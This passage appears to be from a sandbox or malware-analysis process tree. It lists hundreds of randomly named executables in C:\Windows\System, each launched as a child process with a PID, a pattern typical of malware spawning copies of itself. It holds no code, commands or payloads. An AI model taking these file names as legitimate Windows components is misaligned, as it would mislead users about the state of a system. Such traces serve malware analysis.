  C:\Windows\System\HPsaegz.exe
  2⤵
  PID:5900
- C:\Windows\System\ygRwmgQ.exe
  C:\Windows\System\ygRwmgQ.exe
  2⤵
  PID:6644
- C:\Windows\System\qFHdAIS.exe
  C:\Windows\System\qFHdAIS.exe
  2⤵
  PID:6052
- C:\Windows\System\OCTrySg.exe
  C:\Windows\System\OCTrySg.exe
  2⤵
  PID:1620
- C:\Windows\System\bEweEvs.exe
  C:\Windows\System\bEweEvs.exe
  2⤵
  PID:6396
- C:\Windows\System\fEgMBcc.exe
  C:\Windows\System\fEgMBcc.exe
  2⤵
  PID:6836
- C:\Windows\System\uirNmXV.exe
  C:\Windows\System\uirNmXV.exe
  2⤵
  PID:6860
- C:\Windows\System\nFhaKvH.exe
  C:\Windows\System\nFhaKvH.exe
  2⤵
  PID:6940
- C:\Windows\System\YiPkMmg.exe
  C:\Windows\System\YiPkMmg.exe
  2⤵
  PID:7232
- C:\Windows\System\OqhzTkq.exe
  C:\Windows\System\OqhzTkq.exe
  2⤵
  PID:7308
- C:\Windows\System\VXwDgTl.exe
  C:\Windows\System\VXwDgTl.exe
  2⤵
  PID:8212
- C:\Windows\System\gfkBGWm.exe
  C:\Windows\System\gfkBGWm.exe
  2⤵
  PID:8228
- C:\Windows\System\HkcBjma.exe
  C:\Windows\System\HkcBjma.exe
  2⤵
  PID:8248
- C:\Windows\System\uMEsusP.exe
  C:\Windows\System\uMEsusP.exe
  2⤵
  PID:8268
- C:\Windows\System\kcajpvG.exe
  C:\Windows\System\kcajpvG.exe
  2⤵
  PID:8284
- C:\Windows\System\mCpUklP.exe
  C:\Windows\System\mCpUklP.exe
  2⤵
  PID:8308
- C:\Windows\System\MczepVs.exe
  C:\Windows\System\MczepVs.exe
  2⤵
  PID:8332
- C:\Windows\System\ywPlRfp.exe
  C:\Windows\System\ywPlRfp.exe
  2⤵
  PID:8348
- C:\Windows\System\hEEYYWi.exe
  C:\Windows\System\hEEYYWi.exe
  2⤵
  PID:8364
- C:\Windows\System\mLOioDX.exe
  C:\Windows\System\mLOioDX.exe
  2⤵
  PID:8380
- C:\Windows\System\vfFzPms.exe
  C:\Windows\System\vfFzPms.exe
  2⤵
  PID:8396
- C:\Windows\System\TQojzbO.exe
  C:\Windows\System\TQojzbO.exe
  2⤵
  PID:8412
- C:\Windows\System\wGShgDR.exe
  C:\Windows\System\wGShgDR.exe
  2⤵
  PID:8432
- C:\Windows\System\urMwrjS.exe
  C:\Windows\System\urMwrjS.exe
  2⤵
  PID:8452
- C:\Windows\System\HeEEJPw.exe
  C:\Windows\System\HeEEJPw.exe
  2⤵
  PID:8472
- C:\Windows\System\TEZigfu.exe
  C:\Windows\System\TEZigfu.exe
  2⤵
  PID:8492
- C:\Windows\System\MyDqteC.exe
  C:\Windows\System\MyDqteC.exe
  2⤵
  PID:8512
- C:\Windows\System\iIEzoVG.exe
  C:\Windows\System\iIEzoVG.exe
  2⤵
  PID:8536
- C:\Windows\System\IBQXdoW.exe
  C:\Windows\System\IBQXdoW.exe
  2⤵
  PID:8552
- C:\Windows\System\IOHWQlB.exe
  C:\Windows\System\IOHWQlB.exe
  2⤵
  PID:8576
- C:\Windows\System\oEWFlsT.exe
  C:\Windows\System\oEWFlsT.exe
  2⤵
  PID:8600
- C:\Windows\System\rVNjojV.exe
  C:\Windows\System\rVNjojV.exe
  2⤵
  PID:8620
- C:\Windows\System\VqhMOPM.exe
  C:\Windows\System\VqhMOPM.exe
  2⤵
  PID:8644
- C:\Windows\System\GJcZfTP.exe
  C:\Windows\System\GJcZfTP.exe
  2⤵
  PID:8724
- C:\Windows\System\zxGerix.exe
  C:\Windows\System\zxGerix.exe
  2⤵
  PID:8748
- C:\Windows\System\drItXtB.exe
  C:\Windows\System\drItXtB.exe
  2⤵
  PID:8764
- C:\Windows\System\JnCORGi.exe
  C:\Windows\System\JnCORGi.exe
  2⤵
  PID:8792
- C:\Windows\System\PzlzmVT.exe
  C:\Windows\System\PzlzmVT.exe
  2⤵
  PID:8812
- C:\Windows\System\IGiFGts.exe
  C:\Windows\System\IGiFGts.exe
  2⤵
  PID:8832
- C:\Windows\System\kEWNkdO.exe
  C:\Windows\System\kEWNkdO.exe
  2⤵
  PID:8852
- C:\Windows\System\JInKxpz.exe
  C:\Windows\System\JInKxpz.exe
  2⤵
  PID:8876
- C:\Windows\System\sCmSyyw.exe
  C:\Windows\System\sCmSyyw.exe
  2⤵
  PID:8896
- C:\Windows\System\lumXROf.exe
  C:\Windows\System\lumXROf.exe
  2⤵
  PID:8920
- C:\Windows\System\XsRtzkW.exe
  C:\Windows\System\XsRtzkW.exe
  2⤵
  PID:8936
- C:\Windows\System\TxZpfGL.exe
  C:\Windows\System\TxZpfGL.exe
  2⤵
  PID:8956
- C:\Windows\System\rROJPvN.exe
  C:\Windows\System\rROJPvN.exe
  2⤵
  PID:8984
- C:\Windows\System\rpRJurN.exe
  C:\Windows\System\rpRJurN.exe
  2⤵
  PID:9000
- C:\Windows\System\AqXWdDh.exe
  C:\Windows\System\AqXWdDh.exe
  2⤵
  PID:9020
- C:\Windows\System\mXoEMDg.exe
  C:\Windows\System\mXoEMDg.exe
  2⤵
  PID:9036
- C:\Windows\System\ApErkml.exe
  C:\Windows\System\ApErkml.exe
  2⤵
  PID:9064
- C:\Windows\System\JNPFeRc.exe
  C:\Windows\System\JNPFeRc.exe
  2⤵
  PID:9088
- C:\Windows\System\hqictMr.exe
  C:\Windows\System\hqictMr.exe
  2⤵
  PID:9112
- C:\Windows\System\UlZnael.exe
  C:\Windows\System\UlZnael.exe
  2⤵
  PID:9128
- C:\Windows\System\XVOKMAs.exe
  C:\Windows\System\XVOKMAs.exe
  2⤵
  PID:9148
- C:\Windows\System\xZsSSYo.exe
  C:\Windows\System\xZsSSYo.exe
  2⤵
  PID:9172
- C:\Windows\System\KYKtoLA.exe
  C:\Windows\System\KYKtoLA.exe
  2⤵
  PID:9204
- C:\Windows\System\nicTFrh.exe
  C:\Windows\System\nicTFrh.exe
  2⤵
  PID:7360
- C:\Windows\System\jOrFNyc.exe
  C:\Windows\System\jOrFNyc.exe
  2⤵
  PID:7424
- C:\Windows\System\RnkzPWQ.exe
  C:\Windows\System\RnkzPWQ.exe
  2⤵
  PID:7448
- C:\Windows\System\UYEbQiC.exe
  C:\Windows\System\UYEbQiC.exe
  2⤵
  PID:7504
- C:\Windows\System\YMAqsBp.exe
  C:\Windows\System\YMAqsBp.exe
  2⤵
  PID:5232
- C:\Windows\System\ajjeGcd.exe
  C:\Windows\System\ajjeGcd.exe
  2⤵
  PID:5348
- C:\Windows\System\ffkOVcA.exe
  C:\Windows\System\ffkOVcA.exe
  2⤵
  PID:5432
- C:\Windows\System\seJcNlj.exe
  C:\Windows\System\seJcNlj.exe
  2⤵
  PID:5536
- C:\Windows\System\MbRYvjC.exe
  C:\Windows\System\MbRYvjC.exe
  2⤵
  PID:6312
- C:\Windows\System\JKKkjdK.exe
  C:\Windows\System\JKKkjdK.exe
  2⤵
  PID:6368
- C:\Windows\System\ixuJEXa.exe
  C:\Windows\System\ixuJEXa.exe
  2⤵
  PID:6424
- C:\Windows\System\OixwHpc.exe
  C:\Windows\System\OixwHpc.exe
  2⤵
  PID:6604
- C:\Windows\System\ySvxGaK.exe
  C:\Windows\System\ySvxGaK.exe
  2⤵
  PID:1140
- C:\Windows\System\GELNGpT.exe
  C:\Windows\System\GELNGpT.exe
  2⤵
  PID:7780
- C:\Windows\System\ySXYsWl.exe
  C:\Windows\System\ySXYsWl.exe
  2⤵
  PID:4212
- C:\Windows\System\gdXNqQn.exe
  C:\Windows\System\gdXNqQn.exe
  2⤵
  PID:5172
- C:\Windows\System\CflwOtV.exe
  C:\Windows\System\CflwOtV.exe
  2⤵
  PID:7960
- C:\Windows\System\uRRcFaI.exe
  C:\Windows\System\uRRcFaI.exe
  2⤵
  PID:6684
- C:\Windows\System\EeBvYEC.exe
  C:\Windows\System\EeBvYEC.exe
  2⤵
  PID:6672
- C:\Windows\System\dTEbQVw.exe
  C:\Windows\System\dTEbQVw.exe
  2⤵
  PID:6240
- C:\Windows\System\xBAJInS.exe
  C:\Windows\System\xBAJInS.exe
  2⤵
  PID:8108
- C:\Windows\System\VOYEkpE.exe
  C:\Windows\System\VOYEkpE.exe
  2⤵
  PID:8144
- C:\Windows\System\HfLdGxE.exe
  C:\Windows\System\HfLdGxE.exe
  2⤵
  PID:8184
- C:\Windows\System\ydBkkdo.exe
  C:\Windows\System\ydBkkdo.exe
  2⤵
  PID:6488
- C:\Windows\System\VCyQdsa.exe
  C:\Windows\System\VCyQdsa.exe
  2⤵
  PID:6944
- C:\Windows\System\AcGmVeu.exe
  C:\Windows\System\AcGmVeu.exe
  2⤵
  PID:4072
- C:\Windows\System\EAMjPIJ.exe
  C:\Windows\System\EAMjPIJ.exe
  2⤵
  PID:7296
- C:\Windows\System\NiiZrUe.exe
  C:\Windows\System\NiiZrUe.exe
  2⤵
  PID:8204
- C:\Windows\System\xweCnpr.exe
  C:\Windows\System\xweCnpr.exe
  2⤵
  PID:8236
- C:\Windows\System\zEAKWHC.exe
  C:\Windows\System\zEAKWHC.exe
  2⤵
  PID:8276
- C:\Windows\System\oJyfWZd.exe
  C:\Windows\System\oJyfWZd.exe
  2⤵
  PID:8324
- C:\Windows\System\jOVoQav.exe
  C:\Windows\System\jOVoQav.exe
  2⤵
  PID:8376
- C:\Windows\System\ktLEOto.exe
  C:\Windows\System\ktLEOto.exe
  2⤵
  PID:9228
- C:\Windows\System\liZvQqT.exe
  C:\Windows\System\liZvQqT.exe
  2⤵
  PID:9248
- C:\Windows\System\rbDFZom.exe
  C:\Windows\System\rbDFZom.exe
  2⤵
  PID:9268
- C:\Windows\System\nxsHGrz.exe
  C:\Windows\System\nxsHGrz.exe
  2⤵
  PID:9288
- C:\Windows\System\LMInABj.exe
  C:\Windows\System\LMInABj.exe
  2⤵
  PID:9312
- C:\Windows\System\guzXjoP.exe
  C:\Windows\System\guzXjoP.exe
  2⤵
  PID:9328
- C:\Windows\System\cJLzvCW.exe
  C:\Windows\System\cJLzvCW.exe
  2⤵
  PID:9352
- C:\Windows\System\okmkixL.exe
  C:\Windows\System\okmkixL.exe
  2⤵
  PID:9376
- C:\Windows\System\fExIJAE.exe
  C:\Windows\System\fExIJAE.exe
  2⤵
  PID:9392
- C:\Windows\System\FbEeExI.exe
  C:\Windows\System\FbEeExI.exe
  2⤵
  PID:9416
- C:\Windows\System\OxXBbqU.exe
  C:\Windows\System\OxXBbqU.exe
  2⤵
  PID:9436
- C:\Windows\System\hgYskGd.exe
  C:\Windows\System\hgYskGd.exe
  2⤵
  PID:9460
- C:\Windows\System\ikOwyUM.exe
  C:\Windows\System\ikOwyUM.exe
  2⤵
  PID:9480
- C:\Windows\System\imjLpJB.exe
  C:\Windows\System\imjLpJB.exe
  2⤵
  PID:9504
- C:\Windows\System\SsrPCId.exe
  C:\Windows\System\SsrPCId.exe
  2⤵
  PID:9520
- C:\Windows\System\YLFNQIY.exe
  C:\Windows\System\YLFNQIY.exe
  2⤵
  PID:9544
- C:\Windows\System\aptqLYv.exe
  C:\Windows\System\aptqLYv.exe
  2⤵
  PID:9560
- C:\Windows\System\KoqTPEk.exe
  C:\Windows\System\KoqTPEk.exe
  2⤵
  PID:9584
- C:\Windows\System\NfrpCuE.exe
  C:\Windows\System\NfrpCuE.exe
  2⤵
  PID:9604
- C:\Windows\System\aSumknV.exe
  C:\Windows\System\aSumknV.exe
  2⤵
  PID:9624
- C:\Windows\System\pKoedIj.exe
  C:\Windows\System\pKoedIj.exe
  2⤵
  PID:9648
- C:\Windows\System\JqjVoJJ.exe
  C:\Windows\System\JqjVoJJ.exe
  2⤵
  PID:9664
- C:\Windows\System\uhMgbTT.exe
  C:\Windows\System\uhMgbTT.exe
  2⤵
  PID:9688
- C:\Windows\System\hXybfti.exe
  C:\Windows\System\hXybfti.exe
  2⤵
  PID:9712
- C:\Windows\System\LnSAiVe.exe
  C:\Windows\System\LnSAiVe.exe
  2⤵
  PID:9728
- C:\Windows\System\OyZKBfB.exe
  C:\Windows\System\OyZKBfB.exe
  2⤵
  PID:9752
- C:\Windows\System\utZAFId.exe
  C:\Windows\System\utZAFId.exe
  2⤵
  PID:9776
- C:\Windows\System\sKIsOql.exe
  C:\Windows\System\sKIsOql.exe
  2⤵
  PID:9792
- C:\Windows\System\rEadJty.exe
  C:\Windows\System\rEadJty.exe
  2⤵
  PID:9816
- C:\Windows\System\DHZIVuY.exe
  C:\Windows\System\DHZIVuY.exe
  2⤵
  PID:9872
- C:\Windows\System\IfMPLiF.exe
  C:\Windows\System\IfMPLiF.exe
  2⤵
  PID:9900
- C:\Windows\System\azBSeHX.exe
  C:\Windows\System\azBSeHX.exe
  2⤵
  PID:9916
- C:\Windows\System\GswWlio.exe
  C:\Windows\System\GswWlio.exe
  2⤵
  PID:9940
- C:\Windows\System\TnEWcxe.exe
  C:\Windows\System\TnEWcxe.exe
  2⤵
  PID:9956
- C:\Windows\System\YBLRAnZ.exe
  C:\Windows\System\YBLRAnZ.exe
  2⤵
  PID:9980
- C:\Windows\System\yvEeNbl.exe
  C:\Windows\System\yvEeNbl.exe
  2⤵
  PID:5612
- C:\Windows\System\DHHfMnt.exe
  C:\Windows\System\DHHfMnt.exe
  2⤵
  PID:3996
- C:\Windows\System\RTsbcrN.exe
  C:\Windows\System\RTsbcrN.exe
  2⤵
  PID:8912
- C:\Windows\System\LxMMoUq.exe
  C:\Windows\System\LxMMoUq.exe
  2⤵
  PID:5372
- C:\Windows\System\qbFUpGh.exe
  C:\Windows\System\qbFUpGh.exe
  2⤵
  PID:6152
- C:\Windows\System\PPkSriq.exe
  C:\Windows\System\PPkSriq.exe
  2⤵
  PID:8064
- C:\Windows\System\sxEqedT.exe
  C:\Windows\System\sxEqedT.exe
  2⤵
  PID:5856
- C:\Windows\System\kAwMIEz.exe
  C:\Windows\System\kAwMIEz.exe
  2⤵
  PID:6192
- C:\Windows\System\evQcwUz.exe
  C:\Windows\System\evQcwUz.exe
  2⤵
  PID:6296
- C:\Windows\System\VaLqdEq.exe
  C:\Windows\System\VaLqdEq.exe
  2⤵
  PID:7464
- C:\Windows\System\ewBfawm.exe
  C:\Windows\System\ewBfawm.exe
  2⤵
  PID:7500
- C:\Windows\System\qmARbdk.exe
  C:\Windows\System\qmARbdk.exe
  2⤵
  PID:8196
- C:\Windows\System\rsHwPns.exe
  C:\Windows\System\rsHwPns.exe
  2⤵
  PID:9264
- C:\Windows\System\uEBcURE.exe
  C:\Windows\System\uEBcURE.exe
  2⤵
  PID:8508
- C:\Windows\System\xuFDkgC.exe
  C:\Windows\System\xuFDkgC.exe
  2⤵
  PID:8652
- C:\Windows\System\dwSOHnY.exe
  C:\Windows\System\dwSOHnY.exe
  2⤵
  PID:7548
- C:\Windows\System\lVeGDPM.exe
  C:\Windows\System\lVeGDPM.exe
  2⤵
  PID:9640
- C:\Windows\System\bLRcjLJ.exe
  C:\Windows\System\bLRcjLJ.exe
  2⤵
  PID:9532
- C:\Windows\System\aPyQyou.exe
  C:\Windows\System\aPyQyou.exe
  2⤵
  PID:9340
- C:\Windows\System\CLIRQrC.exe
  C:\Windows\System\CLIRQrC.exe
  2⤵
  PID:6768
- C:\Windows\System\MYfHjzt.exe
  C:\Windows\System\MYfHjzt.exe
  2⤵
  PID:6764
- C:\Windows\System\ccoKGkU.exe
  C:\Windows\System\ccoKGkU.exe
  2⤵
  PID:7740
- C:\Windows\System\KauGToi.exe
  C:\Windows\System\KauGToi.exe
  2⤵
  PID:5460
- C:\Windows\System\oEIhiAo.exe
  C:\Windows\System\oEIhiAo.exe
  2⤵
  PID:8740
- C:\Windows\System\beaipEE.exe
  C:\Windows\System\beaipEE.exe
  2⤵
  PID:9800
- C:\Windows\System\WyPIxkB.exe
  C:\Windows\System\WyPIxkB.exe
  2⤵
  PID:9844
- C:\Windows\System\kkDaArj.exe
  C:\Windows\System\kkDaArj.exe
  2⤵
  PID:7616
- C:\Windows\System\AyiyuKT.exe
  C:\Windows\System\AyiyuKT.exe
  2⤵
  PID:7676
- C:\Windows\System\eIlNpyo.exe
  C:\Windows\System\eIlNpyo.exe
  2⤵
  PID:7704
- C:\Windows\System\OOVvrdN.exe
  C:\Windows\System\OOVvrdN.exe
  2⤵
  PID:9964
- C:\Windows\System\ihurWYq.exe
  C:\Windows\System\ihurWYq.exe
  2⤵
  PID:7756
- C:\Windows\System\zzGJgbr.exe
  C:\Windows\System\zzGJgbr.exe
  2⤵
  PID:8948
- C:\Windows\System\zuEZubb.exe
  C:\Windows\System\zuEZubb.exe
  2⤵
  PID:10256
- C:\Windows\System\SHxBEwH.exe
  C:\Windows\System\SHxBEwH.exe
  2⤵
  PID:10276
- C:\Windows\System\JGlwmvl.exe
  C:\Windows\System\JGlwmvl.exe
  2⤵
  PID:10296
- C:\Windows\System\oShWXLA.exe
  C:\Windows\System\oShWXLA.exe
  2⤵
  PID:10316
- C:\Windows\System\fSVSbZN.exe
  C:\Windows\System\fSVSbZN.exe
  2⤵
  PID:10336
- C:\Windows\System\LFwtfak.exe
  C:\Windows\System\LFwtfak.exe
  2⤵
  PID:10360
- C:\Windows\System\UewpfXV.exe
  C:\Windows\System\UewpfXV.exe
  2⤵
  PID:10376
- C:\Windows\System\zrWNbXw.exe
  C:\Windows\System\zrWNbXw.exe
  2⤵
  PID:10400
- C:\Windows\System\MpZRDef.exe
  C:\Windows\System\MpZRDef.exe
  2⤵
  PID:10420
- C:\Windows\System\LqOpYiC.exe
  C:\Windows\System\LqOpYiC.exe
  2⤵
  PID:10448
- C:\Windows\System\njlqjOV.exe
  C:\Windows\System\njlqjOV.exe
  2⤵
  PID:10468
- C:\Windows\System\MXkPYDN.exe
  C:\Windows\System\MXkPYDN.exe
  2⤵
  PID:10484
- C:\Windows\System\eKzAALD.exe
  C:\Windows\System\eKzAALD.exe
  2⤵
  PID:10508
- C:\Windows\System\lJryIRM.exe
  C:\Windows\System\lJryIRM.exe
  2⤵
  PID:10524
- C:\Windows\System\krqFxtH.exe
  C:\Windows\System\krqFxtH.exe
  2⤵
  PID:10548
- C:\Windows\System\LTazvAP.exe
  C:\Windows\System\LTazvAP.exe
  2⤵
  PID:10568
- C:\Windows\System\ACskmAO.exe
  C:\Windows\System\ACskmAO.exe
  2⤵
  PID:10584
- C:\Windows\System\ztbuMiB.exe
  C:\Windows\System\ztbuMiB.exe
  2⤵
  PID:10612
- C:\Windows\System\BXHFScl.exe
  C:\Windows\System\BXHFScl.exe
  2⤵
  PID:10632
- C:\Windows\System\NmkBeKo.exe
  C:\Windows\System\NmkBeKo.exe
  2⤵
  PID:10656
- C:\Windows\System\jjMsQFg.exe
  C:\Windows\System\jjMsQFg.exe
  2⤵
  PID:10676
- C:\Windows\System\CicIILR.exe
  C:\Windows\System\CicIILR.exe
  2⤵
  PID:10692
- C:\Windows\System\MEDPkic.exe
  C:\Windows\System\MEDPkic.exe
  2⤵
  PID:10712
- C:\Windows\System\Vwlmoon.exe
  C:\Windows\System\Vwlmoon.exe
  2⤵
  PID:10728
- C:\Windows\System\OvzDIYi.exe
  C:\Windows\System\OvzDIYi.exe
  2⤵
  PID:10748
- C:\Windows\System\NRjOWTl.exe
  C:\Windows\System\NRjOWTl.exe
  2⤵
  PID:10772
- C:\Windows\System\JYnVlpJ.exe
  C:\Windows\System\JYnVlpJ.exe
  2⤵
  PID:10792
- C:\Windows\System\JydJuvx.exe
  C:\Windows\System\JydJuvx.exe
  2⤵
  PID:10812
- C:\Windows\System\YkOWfYm.exe
  C:\Windows\System\YkOWfYm.exe
  2⤵
  PID:10840
- C:\Windows\System\XljCaOL.exe
  C:\Windows\System\XljCaOL.exe
  2⤵
  PID:10864
- C:\Windows\System\bMxBVjS.exe
  C:\Windows\System\bMxBVjS.exe
  2⤵
  PID:10880
- C:\Windows\System\xHNmlky.exe
  C:\Windows\System\xHNmlky.exe
  2⤵
  PID:10896
- C:\Windows\System\JfxXcra.exe
  C:\Windows\System\JfxXcra.exe
  2⤵
  PID:10920
- C:\Windows\System\CfOmBYA.exe
  C:\Windows\System\CfOmBYA.exe
  2⤵
  PID:10940
- C:\Windows\System\FvEETUF.exe
  C:\Windows\System\FvEETUF.exe
  2⤵
  PID:10964
- C:\Windows\System\DTAJwfX.exe
  C:\Windows\System\DTAJwfX.exe
  2⤵
  PID:10984
- C:\Windows\System\WCfHIAE.exe
  C:\Windows\System\WCfHIAE.exe
  2⤵
  PID:11004
- C:\Windows\System\fSvEHXC.exe
  C:\Windows\System\fSvEHXC.exe
  2⤵
  PID:11024
- C:\Windows\System\jsCrGQq.exe
  C:\Windows\System\jsCrGQq.exe
  2⤵
  PID:11044
- C:\Windows\System\rGkUAJN.exe
  C:\Windows\System\rGkUAJN.exe
  2⤵
  PID:11064
- C:\Windows\System\dpXCYdZ.exe
  C:\Windows\System\dpXCYdZ.exe
  2⤵
  PID:11084
- C:\Windows\System\oKTVqOd.exe
  C:\Windows\System\oKTVqOd.exe
  2⤵
  PID:11108
- C:\Windows\System\TnqNGny.exe
  C:\Windows\System\TnqNGny.exe
  2⤵
  PID:11128
- C:\Windows\System\uwWoQmV.exe
  C:\Windows\System\uwWoQmV.exe
  2⤵
  PID:11148
- C:\Windows\System\Yyxrary.exe
  C:\Windows\System\Yyxrary.exe
  2⤵
  PID:11172
- C:\Windows\System\zUrZhST.exe
  C:\Windows\System\zUrZhST.exe
  2⤵
  PID:11192
- C:\Windows\System\BHJtxwu.exe
  C:\Windows\System\BHJtxwu.exe
  2⤵
  PID:11212
- C:\Windows\System\vekCyjr.exe
  C:\Windows\System\vekCyjr.exe
  2⤵
  PID:5144
- C:\Windows\System\ynUckzb.exe
  C:\Windows\System\ynUckzb.exe
  2⤵
  PID:2112
- C:\Windows\System\JiKUgNT.exe
  C:\Windows\System\JiKUgNT.exe
  2⤵
  PID:5560
- C:\Windows\System\xvksLPB.exe
  C:\Windows\System\xvksLPB.exe
  2⤵
  PID:6028
- C:\Windows\System\oNHPkQe.exe
  C:\Windows\System\oNHPkQe.exe
  2⤵
  PID:7880
- C:\Windows\System\LpFryJr.exe
  C:\Windows\System\LpFryJr.exe
  2⤵
  PID:10136
- C:\Windows\System\sgpFJBA.exe
  C:\Windows\System\sgpFJBA.exe
  2⤵
  PID:464
- C:\Windows\System\TNmAPpc.exe
  C:\Windows\System\TNmAPpc.exe
  2⤵
  PID:6920
- C:\Windows\System\arCEtZw.exe
  C:\Windows\System\arCEtZw.exe
  2⤵
  PID:8548
- C:\Windows\System\BDomfnM.exe
  C:\Windows\System\BDomfnM.exe
  2⤵
  PID:8596
- C:\Windows\System\WBMnFKN.exe
  C:\Windows\System\WBMnFKN.exe
  2⤵
  PID:11268
- C:\Windows\System\bXEGSgU.exe
  C:\Windows\System\bXEGSgU.exe
  2⤵
  PID:11292
- C:\Windows\System\okHsDHI.exe
  C:\Windows\System\okHsDHI.exe
  2⤵
  PID:11312
- C:\Windows\System\LNYlOTx.exe
  C:\Windows\System\LNYlOTx.exe
  2⤵
  PID:12168
- C:\Windows\System\mrGbfBS.exe
  C:\Windows\System\mrGbfBS.exe
  2⤵
  PID:12200
- C:\Windows\System\kEQxBVH.exe
  C:\Windows\System\kEQxBVH.exe
  2⤵
  PID:12220
- C:\Windows\System\JqsFrfd.exe
  C:\Windows\System\JqsFrfd.exe
  2⤵
  PID:12240
- C:\Windows\System\nRdBnTR.exe
  C:\Windows\System\nRdBnTR.exe
  2⤵
  PID:12264
- C:\Windows\System\tzSJeLN.exe
  C:\Windows\System\tzSJeLN.exe
  2⤵
  PID:10216
- C:\Windows\System\MJGhgMA.exe
  C:\Windows\System\MJGhgMA.exe
  2⤵
  PID:9592
- C:\Windows\System\LBPQccx.exe
  C:\Windows\System\LBPQccx.exe
  2⤵
  PID:9660
- C:\Windows\System\cDTToqV.exe
  C:\Windows\System\cDTToqV.exe
  2⤵
  PID:9428
- C:\Windows\System\Qdhlkho.exe
  C:\Windows\System\Qdhlkho.exe
  2⤵
  PID:9260
- C:\Windows\System\CPEzYkr.exe
  C:\Windows\System\CPEzYkr.exe
  2⤵
  PID:7520
- C:\Windows\System\FFXlnpU.exe
  C:\Windows\System\FFXlnpU.exe
  2⤵
  PID:9748
- C:\Windows\System\zQqYvlM.exe
  C:\Windows\System\zQqYvlM.exe
  2⤵
  PID:5428
- C:\Windows\System\YpzXsnS.exe
  C:\Windows\System\YpzXsnS.exe
  2⤵
  PID:6464
- C:\Windows\System\xwNuVzN.exe
  C:\Windows\System\xwNuVzN.exe
  2⤵
  PID:8744
- C:\Windows\System\CkqOoEU.exe
  C:\Windows\System\CkqOoEU.exe
  2⤵
  PID:9360
- C:\Windows\System\FQLvYYX.exe
  C:\Windows\System\FQLvYYX.exe
  2⤵
  PID:6504
- C:\Windows\System\JhHrJLd.exe
  C:\Windows\System\JhHrJLd.exe
  2⤵
  PID:1412
- C:\Windows\System\JvfOtdI.exe
  C:\Windows\System\JvfOtdI.exe
  2⤵
  PID:8780
- C:\Windows\System\apghoKa.exe
  C:\Windows\System\apghoKa.exe
  2⤵
  PID:9764
- C:\Windows\System\yHyJqBS.exe
  C:\Windows\System\yHyJqBS.exe
  2⤵
  PID:9884
- C:\Windows\System\tVSvuKv.exe
  C:\Windows\System\tVSvuKv.exe
  2⤵
  PID:7656
- C:\Windows\System\SzZxzQK.exe
  C:\Windows\System\SzZxzQK.exe
  2⤵
  PID:7720
- C:\Windows\System\zsEQHgn.exe
  C:\Windows\System\zsEQHgn.exe
  2⤵
  PID:7736
- C:\Windows\System\sKpalKT.exe
  C:\Windows\System\sKpalKT.exe
  2⤵
  PID:10252
- C:\Windows\System\vscESXN.exe
  C:\Windows\System\vscESXN.exe
  2⤵
  PID:10332
- C:\Windows\System\FUuuUxK.exe
  C:\Windows\System\FUuuUxK.exe
  2⤵
  PID:10392
- C:\Windows\System\mPJZuSV.exe
  C:\Windows\System\mPJZuSV.exe
  2⤵
  PID:10436
- C:\Windows\System\IxTXvVa.exe
  C:\Windows\System\IxTXvVa.exe
  2⤵
  PID:10492
- C:\Windows\System\wWdkUNO.exe
  C:\Windows\System\wWdkUNO.exe
  2⤵
  PID:10600
- C:\Windows\System\FwofRlS.exe
  C:\Windows\System\FwofRlS.exe
  2⤵
  PID:10688
- C:\Windows\System\rHaiqDo.exe
  C:\Windows\System\rHaiqDo.exe
  2⤵
  PID:10744
- C:\Windows\System\wNKeHdK.exe
  C:\Windows\System\wNKeHdK.exe
  2⤵
  PID:10780
- C:\Windows\System\exRRpPy.exe
  C:\Windows\System\exRRpPy.exe
  2⤵
  PID:10828
- C:\Windows\System\mijOnXJ.exe
  C:\Windows\System\mijOnXJ.exe
  2⤵
  PID:10876
- C:\Windows\System\MDqoJzw.exe
  C:\Windows\System\MDqoJzw.exe
  2⤵
  PID:10936
- C:\Windows\System\TQyywjp.exe
  C:\Windows\System\TQyywjp.exe
  2⤵
  PID:6380
- C:\Windows\System\gMuvrIC.exe
  C:\Windows\System\gMuvrIC.exe
  2⤵
  PID:11208
- C:\Windows\System\nRCWtFa.exe
  C:\Windows\System\nRCWtFa.exe
  2⤵
  PID:8000
- C:\Windows\System\uiksCaL.exe
  C:\Windows\System\uiksCaL.exe
  2⤵
  PID:9364
- C:\Windows\System\MhpvPfg.exe
  C:\Windows\System\MhpvPfg.exe
  2⤵
  PID:8356
- C:\Windows\System\WIjLLND.exe
  C:\Windows\System\WIjLLND.exe
  2⤵
  PID:9140
- C:\Windows\System\NRRJnzs.exe
  C:\Windows\System\NRRJnzs.exe
  2⤵
  PID:9120
- C:\Windows\System\IvvwjMc.exe
  C:\Windows\System\IvvwjMc.exe
  2⤵
  PID:8992
- C:\Windows\System\YhXaFZF.exe
  C:\Windows\System\YhXaFZF.exe
  2⤵
  PID:8844
- C:\Windows\System\yIsuhyi.exe
  C:\Windows\System\yIsuhyi.exe
  2⤵
  PID:11460
- C:\Windows\System\KJVXCLm.exe
  C:\Windows\System\KJVXCLm.exe
  2⤵
  PID:6804
- C:\Windows\System\tiNJPvl.exe
  C:\Windows\System\tiNJPvl.exe
  2⤵
  PID:9196
- C:\Windows\System\qwzfSdE.exe
  C:\Windows\System\qwzfSdE.exe
  2⤵
  PID:7480
- C:\Windows\System\zbJNBEL.exe
  C:\Windows\System\zbJNBEL.exe
  2⤵
  PID:9908
- C:\Windows\System\kaHsowB.exe
  C:\Windows\System\kaHsowB.exe
  2⤵
  PID:9988
- C:\Windows\System\LqiCQoe.exe
  C:\Windows\System\LqiCQoe.exe
  2⤵
  PID:11736
- C:\Windows\System\ijyziYc.exe
  C:\Windows\System\ijyziYc.exe
  2⤵
  PID:10576
- C:\Windows\System\DKUPKjE.exe
  C:\Windows\System\DKUPKjE.exe
  2⤵
  PID:10648
- C:\Windows\System\ZCLkYEg.exe
  C:\Windows\System\ZCLkYEg.exe
  2⤵
  PID:12308
- C:\Windows\System\GMlAOkI.exe
  C:\Windows\System\GMlAOkI.exe
  2⤵
  PID:12336
- C:\Windows\System\UdJOpZG.exe
  C:\Windows\System\UdJOpZG.exe
  2⤵
  PID:12356
- C:\Windows\System\BgcHhXo.exe
  C:\Windows\System\BgcHhXo.exe
  2⤵
  PID:12384
- C:\Windows\System\YVjgoxh.exe
  C:\Windows\System\YVjgoxh.exe
  2⤵
  PID:12416
- C:\Windows\System\JlirjfZ.exe
  C:\Windows\System\JlirjfZ.exe
  2⤵
  PID:12436
- C:\Windows\System\viGQkhz.exe
  C:\Windows\System\viGQkhz.exe
  2⤵
  PID:12464
- C:\Windows\System\KNvNyLQ.exe
  C:\Windows\System\KNvNyLQ.exe
  2⤵
  PID:12484
- C:\Windows\System\owgmAjh.exe
